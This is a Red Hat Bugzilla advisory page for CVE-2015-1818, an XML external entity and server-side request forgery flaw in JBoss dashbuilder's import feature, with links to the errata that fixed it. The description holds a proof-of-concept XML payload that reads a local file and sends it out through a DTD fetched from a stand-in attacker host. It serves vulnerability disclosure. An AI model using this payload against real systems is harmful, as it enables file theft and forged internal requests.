Bugzilla will be upgraded to version 5.0 on a still to be determined date in the near future. The original upgrade date has been delayed.
Bug 1201714 - (CVE-2015-1818) CVE-2015-1818 dashbuilder: XXE/SSRF vulnerability
CVE-2015-1818 dashbuilder: XXE/SSRF vulnerability
Status: NEW
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
medium Severity medium
: ---
: ---
Assigned To: Red Hat Product Security
impact=moderate,public=20150313,repor...
: Security
Depends On: 1211315 1211316 1211317 1211318 1211319 1211320 1246170
Blocks: 1201717 1244364 1244365
  Show dependency treegraph
 
Reported: 2015-03-13 06:25 EDT by Martin Prpič
Modified: 2018-05-10 14:14 EDT (History)
12 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
A flaw was found in the dashbuilder import facility: the DocumentBuilders instantiated in org.jboss.dashboard.export.ImportManagerImpl did not disable external entities. This could allow an attacker to perform a variety of XML External Entity (XXE) and Server-Side Request Forgery (SSRF) attacks.
Story Points: ---
Clone Of:
Environment:
Last Closed:
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)


External Trackers
Tracker ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2015:1539 normal SHIPPED_LIVE Moderate: Red Hat JBoss BPM Suite 6.1.2 update 2015-08-03 19:41:04 EDT
Red Hat Product Errata RHSA-2015:1704 normal SHIPPED_LIVE Moderate: Red Hat JBoss Data Virtualization 6.1.0 security update 2015-09-02 16:28:06 EDT

  None (edit)
Description Martin Prpič 2015-03-13 06:25:08 EDT
A flaw was found in the dashbuilder import facility of JBoss BPMS 6: the DocumentBuilders instantiated in org.jboss.dashboard.export.ImportManagerImpl do not disable external entities.

This could allow an attacker to perform a variate of XXE/SSRF attacks. Exfiltrating data using a general entity attack is not obviously possible, but standard parameter entity exfiltration techniques will work.

For example, importing the following file:

<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///tmp/loot.txt">
<!ENTITY % dtd SYSTEM "http://attacker.com/send.dtd">
%dtd;
%send;
]]>
<doc>bar</doc>

causes Send.dtd to be retrieved, and loot.txt to be exfiltrated if send.dtd contains the appropriate content.

Acknowledgements:

Red Hat would like to thank David Jorm of IIX Product Security for reporting this issue.
Comment 4 errata-xmlrpc 2015-08-03 15:41:16 EDT
This issue has been addressed in the following products:

  JBoss BPM Suite 6.1.2

Via RHSA-2015:1539 https://rhn.redhat.com/errata/RHSA-2015-1539.html
Comment 5 errata-xmlrpc 2015-09-02 12:28:20 EDT
This issue has been addressed in the following products:

  JBoss Data Virtualization 6.1.0

Via RHSA-2015:1704 https://rhn.redhat.com/errata/RHSA-2015-1704.html

Note You need to log in before you can comment on or make changes to this bug.